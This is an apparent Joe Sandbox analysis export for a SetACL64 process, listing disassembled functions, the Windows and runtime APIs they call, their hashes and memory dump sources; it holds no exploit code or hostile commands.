Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
Instruction ID: e6c3e6d04faa08a0f353fa077cc8a51d49c0b4406d109f1d9ad152497e9bf91f
Opcode Fuzzy Hash: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
Instruction Fuzzy Hash: D3A1E5A2B18A9581EA30CB2294046FB63B0FB54BD4F4045B6EE5DC7BC4EF7DD4458300

Function 00007FF6970786C8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00007FF697078741
RtlLookupFunctionEntry.NTDLL ref: 00007FF697078759
RtlVirtualUnwind.NTDLL ref: 00007FF697078794
IsDebuggerPresent.KERNEL32 ref: 00007FF6970787CD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6970787D7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6970787E2

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 0c75d53fa4f789302832d1f0c4a661b2f4dd75274d5b0a99b56319323675b894
Instruction ID: e247b9436c753e71326c9f9b693a3bca6c3a2011e6fd30589732ea25b52b6596
Opcode Fuzzy Hash: 0c75d53fa4f789302832d1f0c4a661b2f4dd75274d5b0a99b56319323675b894
Instruction Fuzzy Hash: BC314F76618B8196DB60CF25E8402AE73A4FB887A4F540175EA8DC7B95EF38D545CB00

Function 00007FF697047580 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 826COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697047C93
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697047C9F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697047F7B

Part of subcall function 00007FF69707E408: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69707E437

Strings

%, xrefs: 00007FF697047FBC

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
String ID: %
API String ID: 1283921372-2567322570
Opcode ID: fe15a6ac4528cf41c533b560c1c99647058aec793d08cb73c2d8515a42d6291c
Instruction ID: 0f7bc9979cf6b292e2444baecdac19a8f2364b1819219b46cba393fc1b858ba6
Opcode Fuzzy Hash: fe15a6ac4528cf41c533b560c1c99647058aec793d08cb73c2d8515a42d6291c
Instruction Fuzzy Hash: FB72DEA2B18A858AEB258F69D4403AD73B2EBA4BC8F445171DE4DD7B98EF3CD445C340

Function 00007FF69708DFF0 Relevance: 7.8, APIs: 5, Instructions: 320fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 00007FF69708E05F
WriteFile.KERNEL32 ref: 00007FF69708E309
WriteFile.KERNEL32 ref: 00007FF69708E35B
GetLastError.KERNEL32 ref: 00007FF69708E49D
GetLastError.KERNEL32 ref: 00007FF69708E4AF

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorFileLastWrite$Console
String ID:
API String ID: 786612050-0
Opcode ID: 595654060b954cd898e70031aa38deb9f7488c276e60d446b525d1db4710fac2
Instruction ID: ef381a67cf3637befbd39b3d7ce548bc12f98937f69ed236f21d3a9f86e93cbe
Opcode Fuzzy Hash: 595654060b954cd898e70031aa38deb9f7488c276e60d446b525d1db4710fac2
Instruction Fuzzy Hash: DDD1F0B2B08A818AE720CB64D4842ED7BB1FB45BD8F544176DE4EC7B99DE39D15AC300

Function 00007FF69706C250 Relevance: 7.8, APIs: 5, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81314747b826c716fa44dea94a216081fde13e1c2a81abd4463a414bef4ca2a
Instruction ID: 4bd73a73096aa89e849c964a5ccd38c7307227c3eea86dad5dcc02d70be1e891
Opcode Fuzzy Hash: e81314747b826c716fa44dea94a216081fde13e1c2a81abd4463a414bef4ca2a
Instruction Fuzzy Hash: C8B190B2B18A4181EA249B25E85436E73A1EB58BD8F404176DB8CC7B99DF7DE690C340

Function 00007FF697044810 Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69704FCA1), ref: 00007FF697044859
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69704FCA1), ref: 00007FF69704486D
LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69704FCA1), ref: 00007FF697044882
FreeResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69704FCA1), ref: 00007FF697044964

Part of subcall function 00007FF6970449B0: VerQueryValueW.VERSION ref: 00007FF697044A5F

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970449A5

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Resource$FindFreeLoadLockQueryValue_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 678723381-0
Opcode ID: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
Instruction ID: 579510ea489f01878e66298d50ff1015c6a408c348b2ad3da8e49e06e396f169
Opcode Fuzzy Hash: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
Instruction Fuzzy Hash: 5741C562A19B8181EA208B24E84536D7361FB95BE4F144234EB9D83BA9EF7CF5C0D700

Function 00007FF697087EB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF697087EE9
GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FF697079847), ref: 00007FF697087F17

Strings

GetLocaleInfoEx, xrefs: 00007FF697087EDD

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: InfoLocaletry_get_function
String ID: GetLocaleInfoEx
API String ID: 2200034068-2904428671
Opcode ID: 591c11f87c398ef623a2c4855596f7f13eeda1a7201aaa3cd71a990fcb1b3bf8
Instruction ID: 9ddad269b007bfb24349004ba096b988c96216784d848ca875056ea28f99bfa7
Opcode Fuzzy Hash: 591c11f87c398ef623a2c4855596f7f13eeda1a7201aaa3cd71a990fcb1b3bf8
Instruction Fuzzy Hash: A801A4A5B08B4282E724DB62F8404EAB761EF94BD0F984476DE4CD3B5ADF3CD9418740

Function 00007FF69707EA10 Relevance: 4.8, APIs: 3, Instructions: 317COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF69707EA76
memcpy_s.LIBCPMT ref: 00007FF69707EAA1

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: e968225ff8479ec0e065da208cfe27b2d7ffdba7a15fb48c526d8961649b34dc
Instruction ID: 804278d588d6814482484cb21f588dcbbbcbd33d6cbacca17029f78d153a9eab
Opcode Fuzzy Hash: e968225ff8479ec0e065da208cfe27b2d7ffdba7a15fb48c526d8961649b34dc
Instruction Fuzzy Hash: 84C1D3B2B1968687E734CF19A58466ABB95F784B88F548134DB4AC3744DE3CF841CB40

Function 00007FF6970870F4 Relevance: 4.7, APIs: 3, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF697083E64: GetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083E73
Part of subcall function 00007FF697083E64: SetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083F11

GetLocaleInfoW.KERNEL32 ref: 00007FF697087160

Part of subcall function 00007FF69708C558: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69708C575

GetLocaleInfoW.KERNEL32 ref: 00007FF6970871A9

Part of subcall function 00007FF69708C558: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69708C5CE

GetLocaleInfoW.KERNEL32 ref: 00007FF697087274

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
String ID:
API String ID: 3644580040-0
Opcode ID: e0e0df95b1f6772363a05c4c36da6839cc36b3106741a851fa59558ae610ced7
Instruction ID: c7c1fc981366ccb7e6756a13ba2c0e4a456d7cdbdc879c82daa2a2aafdeb974b
Opcode Fuzzy Hash: e0e0df95b1f6772363a05c4c36da6839cc36b3106741a851fa59558ae610ced7
Instruction Fuzzy Hash: 4E61AEB2A086428AEB34CF55E4412BD73A1FB94B80F449275DB9ED3699DF3DE590C700

Function 00007FF69708A31C Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF69708A56B
RaiseException.KERNEL32 ref: 00007FF69708A57C

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 0895176a6f24f428c0ae16b17dcf63319d29ac092c4d084468464062deae3fc8
Instruction ID: c30a88e597f41c116b8c405f61de3e1b7811a65977bb8c0240f0e0de0a1fc8e2
Opcode Fuzzy Hash: 0895176a6f24f428c0ae16b17dcf63319d29ac092c4d084468464062deae3fc8
Instruction Fuzzy Hash: DAB15EB3604B448BEB25CF29C4863AC37A0F784B98F198965DA5DC7BA4CF3AD451C700

Function 00007FF69707EF30 Relevance: 3.2, APIs: 2, Instructions: 208COMMONLIBRARYCODE

Download Yara Rule

APIs

_Wcsftime.LIBCMT ref: 00007FF69707EFE2
_Wcsftime.LIBCMT ref: 00007FF69707EF83

Part of subcall function 00007FF6970799A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6970799CF

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Wcsftime$_invalid_parameter_noinfo
String ID:
API String ID: 4239037671-0
Opcode ID: 2ef4f36d1aa6fcae589421110de3d38a91482b1a2c577441207edf7b25e29ba5
Instruction ID: f13b55077fe1793613c08fcffc2e7971073b580c411e05de6ae0efbd8d6c97d7
Opcode Fuzzy Hash: 2ef4f36d1aa6fcae589421110de3d38a91482b1a2c577441207edf7b25e29ba5
Instruction Fuzzy Hash: D48190A2A05A5185EB70CF25D8813BD2760FB84BE8F548676EE5ED7B85DF38E0428340

Function 00007FF69707F394 Relevance: 1.9, APIs: 1, Instructions: 371COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FF69707F4DC

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: f736d91cb022e7ef8bf60a3b77d029e80154dd222c53dc79b684657965080790
Instruction ID: cc5af991fa428ff1a8bd743e12d7eaa9d04a03ab786d9325fa24d04851fd4d57
Opcode Fuzzy Hash: f736d91cb022e7ef8bf60a3b77d029e80154dd222c53dc79b684657965080790
Instruction Fuzzy Hash: B2129D62A08BC586E761CF3894443FD73A4FB58788F459235EB9CC6692EF39E185C700

Function 00007FF697084218 Relevance: 1.8, APIs: 1, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b5727a5fea50101d027ed916251c361a40c46f32150c6b4c553662c3fa156e
Instruction ID: 0163ac9746244582c12024207b821687c49f63600fead9d234fa122cd22125b2
Opcode Fuzzy Hash: 90b5727a5fea50101d027ed916251c361a40c46f32150c6b4c553662c3fa156e
Instruction Fuzzy Hash: 86E148B6A08B8186E720DB61E4406EE27A4FB987C8F414675DF9DD7796EF39D248C300

Function 00007FF697093C64 Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF697093CC8

Part of subcall function 00007FF6970831D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6970831E8

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo
String ID:
API String ID: 474895018-0
Opcode ID: 42818a656ba6ab8851ffb2ca6ee8ba788b28637204efe2d9c2507415ecd12c88
Instruction ID: 4b6f70cd5325e48718855b93fe3deee8027bfb9ec4e765b7a7306b26996f4ec7
Opcode Fuzzy Hash: 42818a656ba6ab8851ffb2ca6ee8ba788b28637204efe2d9c2507415ecd12c88
Instruction Fuzzy Hash: BB71E3A2B0C28246F7748F29D49037DE691EFA03E8F1406B5DA6DC76C5DE7DE8418B00

Function 00007FF697087340 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF697083E64: GetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083E73
Part of subcall function 00007FF697083E64: SetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083F11

GetLocaleInfoW.KERNEL32 ref: 00007FF6970873A8

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: af1d4031c5ed2eef11897b55d0d56a85b12ac158b9d71c250bbe29e6eef00158
Instruction ID: c2e7ce376a25a3ca5c5ab6cf0c61a83ddc2034655f7073dc3de9043fd537ebf8
Opcode Fuzzy Hash: af1d4031c5ed2eef11897b55d0d56a85b12ac158b9d71c250bbe29e6eef00158
Instruction Fuzzy Hash: 0431B1B2A0868286EB34DB25E4413FA77A0FB987C4F44A175DA5DC3689DF7DE4508700

Function 00007FF697086F8C Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF697083E64: GetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083E73
Part of subcall function 00007FF697083E64: SetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083F11

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF697087777,?,00000000,00000092,?,?,00000000,?,00007FF69707966D), ref: 00007FF69708702A

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 2d688c485545e7f50bc5d8269bd6737817ee269d86edfb0b03b51b9adc2a374d
Instruction ID: 3b7bfe8e8f80a972750f284d8b90bf8441d6ddf514a5dca750976920ad1d8456
Opcode Fuzzy Hash: 2d688c485545e7f50bc5d8269bd6737817ee269d86edfb0b03b51b9adc2a374d
Instruction Fuzzy Hash: 6511DFA3A08645CAEB24CF59D4402E87BA0EB90BE0F459175DA69C33C9DE69DAD1CB40

Function 00007FF697087548 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF697083E64: GetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083E73
Part of subcall function 00007FF697083E64: SetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083F11

GetLocaleInfoW.KERNEL32(?,?,?,00007FF6970872F1), ref: 00007FF69708757F

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 4892b2bfc4ba0652f930113fa4804a2aa18176b4a3f13595406afc7e77e25a07
Instruction ID: 9a699634e8f19d0e534f82398f046bc7f70cd41ecb3e20e19fa0423385db6a0d
Opcode Fuzzy Hash: 4892b2bfc4ba0652f930113fa4804a2aa18176b4a3f13595406afc7e77e25a07
Instruction Fuzzy Hash: C1110A72A1C65682E774D751D0406F963A1EB80BA4F146371DA2DC76C8DE7AD981C740

Function 00007FF69708705C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF697083E64: GetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083E73
Part of subcall function 00007FF697083E64: SetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083F11

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF697087733,?,00000000,00000092,?,?,00000000,?,00007FF69707966D), ref: 00007FF6970870DA

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 6cbebb99cc6e6a2fa077ddb3746b0719ab2037c4ac3932a484c09a47ce009c50
Instruction ID: d2c5215dbf6cfbf791e7db799c5ac22dd16218cbdce4edf9e28e4d0b925d7b75
Opcode Fuzzy Hash: 6cbebb99cc6e6a2fa077ddb3746b0719ab2037c4ac3932a484c09a47ce009c50
Instruction Fuzzy Hash: 8F01B5B2F0828186E7248B55E840BF97691EBD0BE4F45A371D679C76D9DF7A9480CB00

Function 00007FF69708791C Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF697087D71,?,?,?,?,?,?,?,?,00000000,00007FF6970865D8), ref: 00007FF69708796B

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
